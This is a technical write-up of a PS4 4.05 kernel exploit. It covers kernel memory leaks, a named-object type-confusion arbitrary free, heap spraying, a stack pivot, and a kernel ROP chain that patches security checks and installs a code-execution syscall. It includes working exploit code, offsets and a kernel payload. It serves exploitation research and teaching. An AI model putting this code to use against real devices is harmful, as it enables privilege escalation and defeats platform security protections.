Introduction

NOTE: Let it be said that I do not condone nor endorse piracy. As such, neither the exploit or this write-up will contain anything to enable piracy on the system.

Welcome to my PS4 kernel exploit write-up for 4.05. In this write-up I will provide a detailed explanation of how my public exploit implementation works, and I will break it down step by step. You can find the full source of the exploit here. The userland exploit will not be covered in this write-up, however I have already provided a write-up on this userland exploit in the past, so if you wish to check that out, click here. Let's jump into it.

Changes since 1.76

Some notable things have changed since 1.76 firmware, most notably the change where Sony fixed the bug where we could allocate RWX memory from an unprivileged process. The process we hijack via the WebKit exploit no longer has RWX memory mapping permissions, as JiT is now properly handled by a seperate process. Calling sys_mmap() with the execute flag will succeed; however any attempt to actually execute this memory as code will result in an access violation. This means that our kernel exploit must be implemented entirely in ROP chains, no C payloads this time.

Another notable change is kernel ASLR (kASLR) is now enabled past 1.76.

Some newer system calls have also been implemented since 1.76. On 1.76, there were 85 custom system calls. On 4.05, we can see there are 120 custom system calls.

Sony has also removed system call 0, so we can no longer call any system call we like by specifying the call number in the rax register. We will have to use wrappers from the libkernel.sprx module provided to us to access system calls.

Stage 1 - Information Disclosure

The first stage of the exploit is to obtain important information from the kernel, I take full advantage of this leak and use it to obtain three pieces of information. To do this, we need a kernel information disclosure/leak. This happens when kernel memory is copied out to the user, but the buffer (or at least parts of it) are not initialized, so uninitialized memory is copied to the user. This means if some function called before it stores pointers (or any data for that matter) in this memory, it will be leaked. Attackers can use this to their advantage, and use a setup function to leak specific memory to craft exploits. This is what we will do.

Helpful information

I thought I'd include this section to help those who don't know how FreeBSD address prefixes work. It's important to know how to distinguish userland and kernel pointers, and which kernel pointers are stack, heap, or .text pointers.

FreeBSD uses a "limit" to define which pointers are userland and which are kernel. Userland can have addresses up to 0x7FFFFFFFFFFF. A kernel address is noted by having the 0x800000000000 bit set. In kernel, the upper 32-bits are set to an address prefix to specify what type of kernel address it is, and the lower 32-bits the rest of the virtual address. The prefixes are as follows, where x can be any hexadecimal digit for the address, and y is an arbitrary hexadecimal digit for the heap address prefix, which is randomized at boot as per kASLR:

0xFFFFFFFFxxxxxxxx = Kernel .text pointer
0xFFFFFF80xxxxxxxx = Kernel stack pointer
0xFFFFyyyyxxxxxxxx = Kernel heap pointer

Vector sys_thr_get_ucontext

System call 634 or sys_thr_get_ucontext() allows you to obtain information on a given thread. The problem is, some areas of memory copied out are not initialized, and thus the function leaks memory at certain spots. This vector was patched in 4.50, as now before the buffer is used it is initialized to 0 via bzero().

The biggest issue with this function is it uses a lot of stack space, so we're very limited to what we can use for our setup function. Our setup function must subtract over 0x500 from rsp all in one go, and whatever we leak will be deep in the code.

This part of the exploit took the most time and research, as it is difficult to know what you are leaking without a debugger, it takes some educated guesses and experimentation to find an appropriate object. Getting the math down perfect won't do much good either because functions can change quite significantly between firmwares, especially when it's a jump like 1.76 to 4.05. This step took me around 1-2 months in my original exploit.

Implementation

Thread Creation

To call sys_thr_get_ucontext() successfully, we must create a thread first, an ScePthread specifically. We can do this using a function from libkernel, ScePthreadCreate(). The signature is as follows:

scePthreadCreate(ScePthread *thr, const ScePthreadAttr *attr, void *(*entry)(void *), void *arg, const char *name)

We can call this in WebKit on 4.05 by offset 0x11570 in libkernel.

Upon success, scePthreadCreate() should return a valid thread handle, and should fill the buffer passed in to ScePthread *thr with an ScePthread struct - we need this as it will hold the thread descriptor we will use in subsequent calls for the leak.

Thread Suspension

Unfortunately, you cannot call sys_thr_get_ucontext() on an active thread, so we must also suspend the thread before we can leak anything. We can do this via sys_thr_suspend_ucontext(). The function signature is as follows:

sys_thr_suspend_ucontext(int sceTd)

Calling this in WebKit is simple, we just need to dereference the value at offset 0 of the buffer we provided to scePthreadCreate(), this is the thread descriptor for the ScePthread.

Setup Function

We need a setup function that uses over 0x500 stack space as stated earlier, between the surface function and any functions it may call. Opening a file (a device for example) is a good place to look, because open() itself uses a lot of stack spaces, and it will also run through a bunch of other sub-routines such as filesystem functions.

I found that opening the "/dev/dipsw" device driver, I was able to leak not only a good object (which I will detail more in the "Object Leak" section below), but also leak kernel .text pointers. This will help us defeat kASLR for kernel patches and gadgets in our kernel ROP chain (from now on we will abbreviate this as "kROP chain").

Leak!

Finally, we can call sys_thr_get_ucontext() to get our leak. The signature is as follows:

sys_thr_get_ucontext(int sceTd, char *buf)

We simply pass sceTd (the same one we got from creation and passed to sys_thr_suspend_ucontext), and pass a pointer to our buffer as the second argument. When the call returns, we will have leaked kernel information in buf.

kASLR Defeat

First, we want to locate the kernel's .text base address. This will be helpful for post-exploitation stuff, for example, cr0 gadgets are typically only available in kernel .text, as userland does not directly manipulate the cr0 register. We will want to manipulate the cr0 register to disable kernel write protection for kernel patching. How can we do this? We can simply leak a kernel .text pointer and subtract it's slide in the .text segment to find the base address of the kernel.

In our buffer containing the leaked memory, we can see at offset 0x128 we are leaking a kernel .text address. This is also convenient, because as you will see in the next section "Object Leak", it is adjacent to our object leak in memory, so it will also help us verify the integrity of our leak. Because I had a dump of 4.05 kernel already from my previous exploit, I found the slide of this .text pointer to be 0x109E96. For those curious, it is a pointer to the section in _vn_unlock() where the flags are checked before unlocking a vnode.

A good indication that your slide is good, is the kernel .text base is always aligned to 0x4000, which is the PS4's page boundary. This means your kernel .text base address should end in '000'.

Object Leak

Secondly, we need to leak an object in the heap that we can later free() and corrupt to obtain code execution. Some objects are also much better candidates than others. The following traits make for a good object for exploitation:

Has function pointers. Not needed per-se, you could obtain arbitary kernel R/W and use that to corrupt some other object, but function pointers are ideal.
Localized. You don't want an object that is used by some other area in the kernel ideally, because this could make the exploit racey and less stable.
Easy to fake. We need an object that we don't need to leak a bunch of other pointers to fake when we heap spray.
Objects associated to things like file descriptors make for great targets!

At offset 0x130, it seems we leak a cdev_priv object, which are objects that represent character devices in memory. It seems this object leaks from the devfs_open() function, which also explains our _vn_unlock() leak at 0x128 for the ASLR defeat.

Unfortunately, not all objects we leak are going to meet the ideal criteria. This object breaks criteria 2, however luckily it meets criteria 3 and we can fake it perfectly. Nothing else will use the dipsw device driver while our exploit runs, meaning even though our exploit uses a global object, it is still incredibly stable. It also has a bunch of function pointers we can use to hijack code execution via the cdev_priv->cdp_c->c_devsw object, meeting criteria 1.

We can also see that cdev_priv objects are allocated in devfs_alloc(), which is eventually called by make_dev(). Luckily, cdev_priv objects are malloc()'d and not zone allocated, so we should have no issues freeing it.

src

devfs_alloc(int flags)
{
    struct cdev_priv *cdp;
    struct cdev *cdev;
    struct timespec ts;

    cdp = malloc(sizeof *cdp, M_CDEVP, M_USE_RESERVE | M_ZERO | ((flags & MAKEDEV_NOWAIT) ? M_NOWAIT : M_WAITOK));
        
    if (cdp == NULL)
        return (NULL);

    // ...

    cdev = &cdp->cdp_c;

    // ...

    return (cdev);
}

Stack Pivot Fix

One last piece of information we need is a stack address. The reason for this is when we stack pivot to run our ROP chain in kernel mode, we need to return to userland cleanly, meaning fix the stack register (rsp) which we broke.

Luckily, because kernel stacks are per-thread, we can use a stack address that we leak to calculate the new return location when the ROP chain is finished executing. I made this calculation by taking the difference of the base pointer (rbp) from where the kernel jumps to our controlled function pointer and a stack pointer that leaks. At offset 0x20 in the leak buffer we can see a stack address, I found the difference to be 0x3C0.

Putting it all together

First, we will create our thread for the sys_thr_get_ucontext leak, and set it so that it's program is an infinite loop gadget so it keeps running. We'll also create a ROP chain for stage 1, where we will open /dev/dipsw and leak, and we'll also setup the namedobj for stage 3 as well.

var createLeakThr = p.call(libkernel.add32(0x11570), leakScePThrPtr, 0, window.gadgets["infloop"], leakData, stringify("leakThr"));
p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));

Then to leak, we will suspend the thread, open the /dev/dipsw device driver, and leak the cdev_priv object.

var stage1 = new rop(p, undefined);

stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_suspend_ucontext']]), p.read4(p.read8(leakScePThrPtr)));
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_open']]), stringify("/dev/dipsw"), 0, 0);
stage1.saveReturnValue(targetDevFd);
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_get_ucontext']]), p.read4(p.read8(leakScePThrPtr)), leakData);

stage1.run();

Before continuing with the exploit for stability purposes, it's good to include an integrity check against your leak to ensure you know you're leaking the right object. The integrity check is verifying the kernel .text leak to ensure that the base address aligns with a page. This check will all at once allow us to defeat kASLR and check if the leak is valid.

// Extract leaks
kernelBase = p.read8(leakData.add32(0x128)).sub32(0x109E96);
objBase = p.read8(leakData.add32(0x130));
stackLeakFix = p.read8(leakData.add32(0x20));

if(kernelBase.low & 0x3FFF)
{
    alert("Bad leak! Terminating.");
    return false;
}

Stage 2 - Arbitrary Free

A combination of design flaws led to a critical bug in the kernel, which allows an attacker to free() an arbitrary address. The issue lies in the idt hash table that Sony uses for named objects. I won't go full in-depth on the idt hash table as that's already been covered in depth by fail0verflow's public write-up. The main issue is Sony stores the object's type as well as flags in one field, and allow the user to specify it. This means the attacker can cause type confusion, which later leads to an arbitrary free() situation.

Vector 1 - sys_namedobj_create

By creating a named object with type = 0x5000 (or 0x4000 due to the function OR'ing the ID with 0x1000), we can cause type confusion in the idt hash table. Upon success, it returns an ID of the named object.

Vector 2 - sys_mdbg_service

When sys_mdbg_service() goes to write bytes passed in from a userland buffer at offset 0x4 to 0x8 to the named object returned, it actually writes to the wrong object due to type confusion. This allows the attacker to overwrite the pointer's lower 32-bits in the named object with any value.

Vector 3 - sys_namedobj_delete

When sys_namedobj_delete() is called, it first free()'s at offset 0 of the object before free()ing the object. Because we can contain 0x4-0x8 in the object in sys_mdbg_service via type confusion, we can control the lower 32-bits of the pointer that is free()'d here. Luckily, because this object is SUPPOSED to contain a heap pointer at offset 0, the heap address prefix is set for us. If this was not the case, this bug would not be exploitable.

Implementation

Creating a named object

The first thing we need to do is create a named object to put in the idt with the malicious 0x5000 type. We can do that via the sys_namedobj_create() system call like this:

p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));

Writing a pointer to free

We need to be able to write to the no->name field of the named object, because when we cause type confusion and delete the object, the address free()'d will be taken from the lower 32-bits of the no->name field. To do this, we can use the sys_mdbg_service() system call, like so:

p.write8(serviceBuff.add32(0x4), objBase);
p.writeString(serviceBuff.add32(0x28), "debug");
        
// ...

var stage3 = new rop(p, undefined);

stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);

Free!

Finally, we need to trigger the free() on the address we wrote via sys_namedobj_delete(). Because of the object being cast to a namedobj_dbg_t type, it will free() the address specified at offset 0x4 (which is no->name in namedobj_usr_t. It is remarkable that this is the field that is free()'d, and that the field's upper 32-bits will already be set to the heap address prefix due to it being a pointer to the object's name. If this was not the case, we could not create a use-after-free() scenario as we would not be able to set the upper 32-bits, and this type confusion bug might otherwise be unexploitable.

We can trigger the free() by simply deleting our named object via:

stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);

Stage 3 - Heap Spray/Object Fake

I'll detail a little bit in this section of what heap spraying is for those newer to exploitation, if you already know how it works however, feel free to skip this section.

Helpful information

Memory allocators have to be efficient, because allocating brand new memory is costly in terms of performance. To be more efficient, heap memory is typically sectioned into "chunks" (also called "buckets"), and these chunks are typically marked as "used" or "free". To save performance, if an allocation is requested, the kernel will first check to see if it can give you a chunk that's already been allocated (but marked "free") of a similar size before allocating a new chunk.

The chunk sizes are powers of 2 starting at 16, meaning you can get chunks of size 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, or 0x4000. You can find these defined in the kmemzones array in FreeBSD's source file responsible for memory allocation, kern_malloc.c.

We can abuse this to control the data of our free()'d object, and thus corrupt it. The cdev_priv object is 0x180 in size, meaning it will use a chunk of size 0x200. So if we continousily allocate, write, and deallocate a chunk of memory of a size above 0x100 and below 0x200, eventually the next malloc() call should give you the pointer you've maintained a reference to, which means your exploit can write to this pointer, and corrupt the backing memory of the object. This is called spraying the heap.

For more information on heap spraying, see here.

Corrupting the object

We're going to spray the heap with our fake object that we've created in userland. Our faked object will prevent the kernel from crashing by faking data we need to, and allow us to obtain code execution by hijacking a function pointer in the object. First let's take a look at the cdev object, which is the first member (inlined) of cdev_priv. For reference, each member also has it's offset in the structure.

As to not make this write-up longer than it needs to be, I will only include some of the pointers that I faked. Other integers in the struct such as flags, mode, and the time stamp members I took from dumping the object live.

The cdev object

The cdev object is the core of the cdev_priv object, and contains important information about the device. Notably, it includes the name of the device, it's operations vtable, reference counts, and a linked list to previous and next cdev_priv devices.

src

struct cdev {
	void            *__si_reserved;					// 0x000
	u_int           si_flags;					// 0x008
	struct timespec si_atime;					// 0x010
	struct timespec si_ctime;				        // 0x020
	struct timespec si_mtime;					// 0x030
	uid_t           si_uid;						// 0x040
	gid_t           si_gid;						// 0x044
	mode_t          si_mode;					// 0x048
	struct ucred    *si_cred;					// 0x050
	int             si_drv0;					// 0x058
	int             si_refcount;					// 0x05C
	LIST_ENTRY(cdev)        si_list;				// 0x060
	LIST_ENTRY(cdev)        si_clone;				// 0x070
	LIST_HEAD(, cdev)       si_children;	    		        // 0x080
	LIST_ENTRY(cdev)        si_siblings;	    		        // 0x088
	struct cdev *si_parent;						// 0x098
	char            *si_name;					// 0x0A0
	void            *si_drv1, *si_drv2;				// 0x0A8
	struct cdevsw   *si_devsw;					// 0x0B8
	int             si_iosize_max;                                  // 0x0C0
	u_long          si_usecount;					// 0x0C8
	u_long          si_threadcount;					// 0x0D0
	union {
		struct snapdata *__sid_snapdata;
	} __si_u;							// 0x0D8
	char            __si_namebuf[SPECNAMELEN + 1];	                // 0x0E0
};

si_name

The si_name member points to the __si_namebuf buffer inside the object, which is 64-bytes in length. Normally, a string will be written here, "dipsw". We're going to overwrite this though for our stack pivot, which will be the objective of the next stage. It is important to fix this post-exploit, because other processes that may want to open the "dipsw" device driver will not be able to if the name is not set properly, as it cannot be identified.

p.write8(obj_cdev_priv.add32(0x0A0), objBase.add32(0x0E0));
p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot

si_devsw

si_devsw is our ultimate target object. It's usually a static object in kernel .text which contains function pointers for all sorts of operations with the device, including ioctl(), mmap(), open(), and close(). We can fake this pointer and make it point to an object we setup in userland, as the PS4 does not have Supervisor-Mode-Access-Prevention (SMAP).

p.write8(obj_cdev_priv.add32(0x0B8), obj_cdevsw); // Target Object

The (rest of the) cdev_priv object

Originally, I spent a lot of time trying to fake the members from 0x120 to 0x180 in the object. Some of these members are difficult to fake as there are linked lists and pointers to object's that are in completely different zones. We can use a neat trick to cheat our way out of not needing to fake any of this data in our spray. I will cover this more in-depth when we cover the heap spray specifics.

The cdevsw object

The cdevsw object is a vtable which contains function pointers for various operations such as open(), close(), ioctl(), and many more. Thankfully because the "dipsw" device driver isn't used while we're exploiting, we can just pick one to overwrite (I chose ioctl()), trigger code execution, and fix the pointer back to the proper kernel .text location post-exploit.

src

struct cdevsw {
	int                     d_version;			// 0x00
	u_int                   d_flags;			// 0x04
	const char              *d_name;			// 0x08
	d_open_t                *d_open;			// 0x10
	d_fdopen_t              *d_fdopen;			// 0x18
	d_close_t               *d_close;			// 0x20
	d_read_t                *d_read;			// 0x28
	d_write_t               *d_write;			// 0x30
	d_ioctl_t               *d_ioctl;			// 0x38
	d_poll_t                *d_poll;			// 0x40
	d_mmap_t                *d_mmap;			// 0x48
	d_strategy_t            *d_strategy;		        // 0x50
	dumper_t                *d_dump;	    	        // 0x58
	d_kqfilter_t            *d_kqfilter;		        // 0x60
	d_purge_t               *d_purge;			// 0x68
	d_mmap_single_t         *d_mmap_single;		        // 0x70

	int32_t                 d_spare0[3];		        // 0x78
	void                    *d_spare1[3];		        // 0x88

	LIST_HEAD(, cdev)       d_devs;				// 0xA0
	int                     d_spare2;			// 0xA8
	union {
		struct cdevsw           *gianttrick;
		SLIST_ENTRY(cdevsw)     postfree_list;
	} __d_giant;					        // 0xB0
};

Target - d_ioctl

We're going to overwrite the d_ioctl address with our stack pivot gadget. When we go to call ioctl() on our opened device driver, the kernel will jump to our stack pivot gadget, run our kROP chain, and cleanly exit.

p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER

This is another member we must fix post-exploit, as if anything else that uses "dipsw" (which is quite a lot of other processes) goes to perform an operation such as open(), it will crash the kernel because your faked object in userland will not be accessible by other processes as other processes will not have access to WebKit's mapped memory.

Spray

We can use the ioctl() system call to spray using a bad file descriptor. The system call will first malloc() memory, with the size being specified by the caller via parameter, and will copyin() data we control into the allocated buffer. Due to the bad file descriptor, the system call will then free the buffer, and exit in error. It's a perfect vector for a spray because we control the size, the data being copied in, and it's immediately free'd.

The neat trick I mentioned earlier is using a size of 0x120 for our spray's copyin(). Because 0x120 is greater than 0x100 and lesser than 0x200, the chunk size matches our target object. However, because we are only specifying 0x120 for the copyin(), any data between 0x120-0x180 will not be initialized, meaning it will not get corrupted. No need to fake linked lists or attempt to fake pointers that we can't fake perfectly.

for(var i = 0; i < 500; i++)
{
    stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_ioctl']]), 0xDEADBEEF, 0x81200000, obj_cdev_priv);
}

stage3.run();

Stage 4 - Kernel Stack Pivot

To execute our ROP chain, we're going to need to pivot the stack to that of our ROP chain, to do this we can use a gadget in the libc module. This gadget loads rsp from [rdi + 0xF8], and pushes [rdi + 0xE0], which we can use to set RIP to the ret gadget. We control the rdi register, as rdi is going to be loaded with the buffer we pass in to the ioctl() call. Below is a snippet of the stack pivot gadget we will use from sceLibcInternal.sprx:

mov     rsp, [rdi+0F8h]
mov     rcx, [rdi+0E0h]
push    rcx
mov     rcx, [rdi+60h]
mov     rdi, [rdi+48h]
retn

Luckily, 0xE0 and 0xF8 fall inside the __si_namebuf member of cdev, which are members that can easily be fixed post-exploit.

From devfs_ioctl_f() in /fs/devfs/devfs_vnops.c (src):

// ...
dev_relthread(dev, ref);
// ...
error = dsw->d_ioctl(dev, com, data, fp->f_flag, td);
// ...

This is where the kernel will call the function pointer that we control. Notice rdi is loaded with dev, which is the cdev object we control. We can easily implement this stack pivot in our object fake, like so:

p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
// ...
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot
// ...
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER

Here is an excellent resource on stack pivoting and how it works for those interested.

Stage 5 - Building the Kernel ROP Chain

Our kROP or kernel ROP chain is going to be a chain of instructions that we run from supervisor mode. We want to accomplish a few things with this chain. First, we want to apply a few kernel patches to allow us to run payloads and escalate our privileges. Finally before returning we'll want to fix the object to stabilize the kernel.

Disabling Kernel Write Protection

We have to disable the write protection on the kernel .text before we can make any patches. We can use the mov cr0, rax gadget to do this. The cr0 register contains various control flags for the CPU, one of which is the "WP" bit at bit 16. By unsetting this, we can write to read-only memory pages in ring0, such as kernel .text.

// Disable kernel write protection
kchain.push(window.gadgets["pop rax"]);      // rax = 0x80040033;
kchain.push(0x80040033);
kchain.push(kernelBase.add32(0x389339));     // mov cr0, rax;

For more information on the cr0 control register, see the OSDev wiki.

Allowing RWX Memory Mapping

We want to be able to run C payloads and run our loader, so we need to patch the mmap system call to allow us to set the execute bit to map RWX memory pages.

seg000:FFFFFFFFA1824FD9                 mov     [rbp+var_61], 33h
seg000:FFFFFFFFA1824FDD                 mov     r15b, 33h

These are the maximum allowed permission bits the user is allowed to pass to sys_mmap() when mapping memory. By changing 0x33 in both of these move instructions to 0x37, it will allow us to specify the execute bit successfully.

// Patch sys_mmap: Allow RWX (read-write-execute) mapping
var kernel_mmap_patch = new int64(0x37B74137, 0x3145C031);
kchain.write64(kernelBase.add32(0x31CFDC), kernel_mmap_patch);

Syscall Anywhere

Sony checks and ensures that a syscall instruction can only be issued from the memory range of the libkernel.sprx module. They also check the instructions around it to ensure it keeps the format if a typical wrapper. These patches will allow us to use the syscall instruction in our ROP chain, which will be important for fixing the object later.

The first patch allows kernel processes to initiate syscall instructions. This is because processes have a p_dynlib member that specifies if libkernel has been loaded. This patch makes certain that any module can call syscall even if the libkernel module has not yet been loaded.

seg000:FFFFFFFFA15F5095                 mov     ecx, 0FFFFFFFFh

Which is patched to

mov ecx, 0x0

The second patch forces a jump below check to fail, so that our first patch is put to use.

seg000:FFFFFFFFA15F50BB                 cmp     rdx, [rax+0E0h]
seg000:FFFFFFFFA15F50C2                 jb      short loc_FFFFFFFFA15F50D7

Which is patched to

seg000:FFFFFFFFA15F50BB                 jmp     loc_FFFFFFFFA15F513D

This will allow WebKit to issue a syscall instruction directly.

// Patch syscall: syscall instruction allowed anywhere
var kernel_syscall_patch1 = new int64(0x0000000, 0xF8858B48);
var kernel_syscall_patch2 = new int64(0x0007DE9, 0x72909000);
kchain.write64(kernelBase.add32(0xED096), kernel_syscall_patch1);
kchain.write64(kernelBase.add32(0xED0BB), kernel_syscall_patch2);

Allow sys_dynlib_dlsym from Anywhere

Our payloads are going to need to be able to resolve userland symbols, so these patches are essential for running payloads.

The first patch patches a check against a member that Sony added to the proc structure that defines if a process can call sys_dynlib_dlsym().

seg000:FFFFFFFFA1652ACF                 mov     rdi, [rbx+8]
seg000:FFFFFFFFA1652AD3                 call    sub_FFFFFFFFA15E6930
seg000:FFFFFFFFA1652AD8                 cmp     eax, 4000000h
seg000:FFFFFFFFA1652ADD                 jb      loc_FFFFFFFFA1652D8B

The second patch forces a function that checks if the process should have dynamic resolving to always return 0.

seg000:FFFFFFFFA15EADA0 sub_FFFFFFFFA15EADA0 proc near          ; CODE XREF: sys_dynlib_dlsym+F9↓p
seg000:FFFFFFFFA15EADA0                                         ; sys_dynlib_get_info+1FC↓p ...
seg000:FFFFFFFFA15EADA0                 mov     rax, gs:0
seg000:FFFFFFFFA15EADA9                 mov     rax, [rax+8]
seg000:FFFFFFFFA15EADAD                 mov     rcx, [rax+340h]
seg000:FFFFFFFFA15EADB4                 mov     eax, 1
seg000:FFFFFFFFA15EADB9                 test    rcx, rcx
seg000:FFFFFFFFA15EADBC                 jz      short locret_FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADBE                 test    [rcx+0F0h], edi
seg000:FFFFFFFFA15EADC4                 setnz   al
seg000:FFFFFFFFA15EADC7                 movzx   eax, al
seg000:FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADCA locret_FFFFFFFFA15EADCA:                ; CODE XREF: sub_FFFFFFFFA15EADA0+1C↑j
seg000:FFFFFFFFA15EADCA                 retn
seg000:FFFFFFFFA15EADCA sub_FFFFFFFFA15EADA0 endp

This is patched to simply:

seg000:FFFFFFFFA15EADA0                 xor eax, eax
seg000:FFFFFFFFA15EADA2                 ret
[nop x5]

Patching both of these checks should allow any process, even WebKit, to dynamically resolve symbols.

// Patch sys_dynlib_dlsym: Allow from anywhere
var kernel_dlsym_patch1 = new int64(0x000000E9, 0x8B489000);
var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
kchain.write64(kernelBase.add32(0x14AADD), kernel_dlsym_patch1);
kchain.write64(kernelBase.add32(0xE2DA0), kernel_dlsym_patch2);

Install kexec system call

Our goal with this patch is to create our own syscall under syscall #11. This syscall will allow us to execute arbitrary code in supervisor mode (ring0). It will only have two arguments, the first being a pointer to the function we want to execute. The second argument will be uap to pass arguments to the function. This code creates an entry in the sysent table.

// Add custom sys_exec() call to execute arbitrary code as kernel
var kernel_exec_param = new int64(0, 1);
kchain.write64(kernelBase.add32(0xF179A0), 0x02);
kchain.write64(kernelBase.add32(0xF179A8), kernelBase.add32(0x65750));
kchain.write64(kernelBase.add32(0xF179C8), kernel_exec_param);

Kernel Exploit Check

We don't want the kernel exploit to run more than once, as once we install our custom kexec() system call we don't need to. To do this, I decided to patch the privilege check out of the sys_setuid() system call, so we will know if the kernel has been patched if we can successfully call setuid(0) from WebKit.

seg000:FFFFFFFFA158DBB0                 call    priv_check_cred

To easily bypass this check, I decided to just change it to move 0 into the rax register. The opcodes happened to be perfect size.

seg000:FFFFFFFFA158DBB0                 mov eax, 0

As you can guess, this also doubles as a partial privilege escalation.

// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
var kexploit_check_patch = new int64(0x000000B8, 0x85C38900);
kchain.write64(kernelBase.add32(0x85BB0), kexploit_check_patch);

Exit to Userland

Finally, we want to exit our kROP chain to prevent crashing the kernel. To do this, we need to restore RSP to it's value before the stack pivot. As stated earlier, we have a stack leak at 0x20 in the leak buffer, and it's 0x3C0 off from a good RSP value to return to. These instructions will apply the RSP fix by popping the stack leak + 0x3C0 into the RSP register, and when the final gadget ret's it will return to proper execution.

// Exit kernel ROP chain
kchain.push(window.gadgets["pop rax"]);
kchain.push(stackLeakFix.add32(0x3C0));
kchain.push(window.gadgets["pop rcx"]);
kchain.push(window.gadgets["pop rsp"]);
kchain.push(window.gadgets["push rax; jmp rcx"]);

Stage 6 - Trigger

Now we need to trigger the exploit by calling the ioctl() system call on our object. The second parameter (cmd) does not matter because the handler will never be reached as we have overwritten it with our stack pivot gadget.

p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);

Stage 7 - Stabilizing the Object

Finally, we need to ensure the object doesn't get corrupted. The cdev_priv object is global, meaning other processes will go to use it at some point. Since we free()'d it's backing memory, some other allocation could steal this pointer and overwrite our faked object, causing unpredictable crashes. To avoid this, we can call malloc() in the kernel a bunch of times to try to obtain this pointer, essentially we are performing a second heap spray, but if we find the address we want we are keeping the allocation.

Since the kernel payload needs to retrieve the address of the object to write to, we will store it at an absolute address, 0xDEAD0000. We will also use this mapping to execute our payload.

var baseAddressExecute = new int64(0xDEAD0000, 0);
var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);

var executeSegment = new memory(p, exploitExecuteAddress);

var objBaseStore = executeSegment.allocate(0x8);
var shellcode = executeSegment.allocate(0x200);

p.write8(objBaseStore, objBase);

We will also apply a few of our other patches to the object, such as restoring the object's name and original si_devsw pointer.

src

int main(void)
{
	int i;
	void *addr;
	uint8_t *ptrKernel;

	int (*printf)(const char *fmt, ...) 						= NULL;
	void *(*malloc)(unsigned long size, void *type, int flags) 	= NULL;
	void (*free)(void *addr, void *type) 						= NULL;

	// Get kbase and resolve kernel symbols
	ptrKernel = (uint8_t *)(rdmsr(0xc0000082) - KERN_XFAST_SYSCALL);
	malloc 	= (void *)&ptrKernel[KERN_MALLOC];
	free 	= (void *)&ptrKernel[KERN_FREE];
	printf 	= (void *)&ptrKernel[KERN_PRINTF];

	uint8_t *objBase = (uint8_t *)(*(uint64_t *)(0xDEAD0000));

	// Fix stuff in object that's corrupted by exploit
	*(uint64_t *)(objBase + 0x0E0) = 0x7773706964;
	*(uint64_t *)(objBase + 0x0F0) = 0;
	*(uint64_t *)(objBase + 0x0F8) = 0;

	// Malloc so object doesn't get smashed
	for (i = 0; i < 512; i++)
	{
		addr = malloc(0x180, &ptrKernel[0x133F680], 0x02);

		printf("Alloc: 0x%lx\n", addr);

		if (addr == (void *)objBase)
			break;

		free(addr, &ptrKernel[0x133F680]);
	}

	printf("Object Dump 0x%lx\n", objBase);

	for (i = 0; i < 0x180; i += 8)
		printf("<Debug> Object + 0x%03x: 0x%lx\n", i, *(uint64_t *)(*(uint64_t *)(0xDEAD0000) + i));

	// EE :)

	return 0;
}

This payload was then compiled and converted into shellcode which is executed via our kexec() system call we installed earlier.

var stage7 = new rop(p, undefined);

p.write4(shellcode.add32(0x00000000), 0x00000be9);
p.write4(shellcode.add32(0x00000004), 0x90909000);
p.write4(shellcode.add32(0x00000008), 0x90909090);
// ... [ommited for readability]

stage7.push(window.gadgets["pop rax"]);
stage7.push(11);
stage7.push(window.gadgets["pop rdi"]);
stage7.push(shellcode);
stage7.push(libkernel.add32(0x29CA)); // "syscall" gadget

stage7.run();

Conclusion

This exploit is quite an interesting exploit, though it did require a lot of guessing and would have been a lot more fun to work with should I have had a proper kernel debugger. To get a working object can be a long a grueling process depending on the leak you're using. Overall this exploit is incredibly stable, in fact I ran it over 30 times and WebKit nor the Kernel crashed once. I learned a lot from implementing it, and I hope I helped others like myself who are interested in exploitation and hopefully others will learn some things from this write-up.

Special Thanks

CTurt
Flatz
qwertyoruiopz
other anonymous contributors

Mistakes?

See any issues I glanced over? Open an issue or send me a tweet and let me know :)

Table of contents generated with markdown-toc.

Files

"NamedObj" 4.05 Kernel Exploit Writeup.md

Latest commit

History

"NamedObj" 4.05 Kernel Exploit Writeup.md

File metadata and controls

Table of Contents

Introduction

Changes since 1.76

Stage 1 - Information Disclosure

Helpful information

Vector sys_thr_get_ucontext

Implementation

Thread Creation

Thread Suspension

Setup Function

Leak!

kASLR Defeat

Object Leak

Stack Pivot Fix

Putting it all together

Stage 2 - Arbitrary Free

Vector 1 - sys_namedobj_create

Vector 2 - sys_mdbg_service

Vector 3 - sys_namedobj_delete

Implementation

Creating a named object

Writing a pointer to free

Free!

Stage 3 - Heap Spray/Object Fake

Helpful information

Corrupting the object

The cdev object

si_name

si_devsw

The (rest of the) cdev_priv object

The cdevsw object

Target - d_ioctl

Spray

Stage 4 - Kernel Stack Pivot

Stage 5 - Building the Kernel ROP Chain

Disabling Kernel Write Protection

Allowing RWX Memory Mapping

Syscall Anywhere

Allow sys_dynlib_dlsym from Anywhere

Install kexec system call

Kernel Exploit Check

Exit to Userland

Stage 6 - Trigger

Stage 7 - Stabilizing the Object

Conclusion

Special Thanks

Mistakes?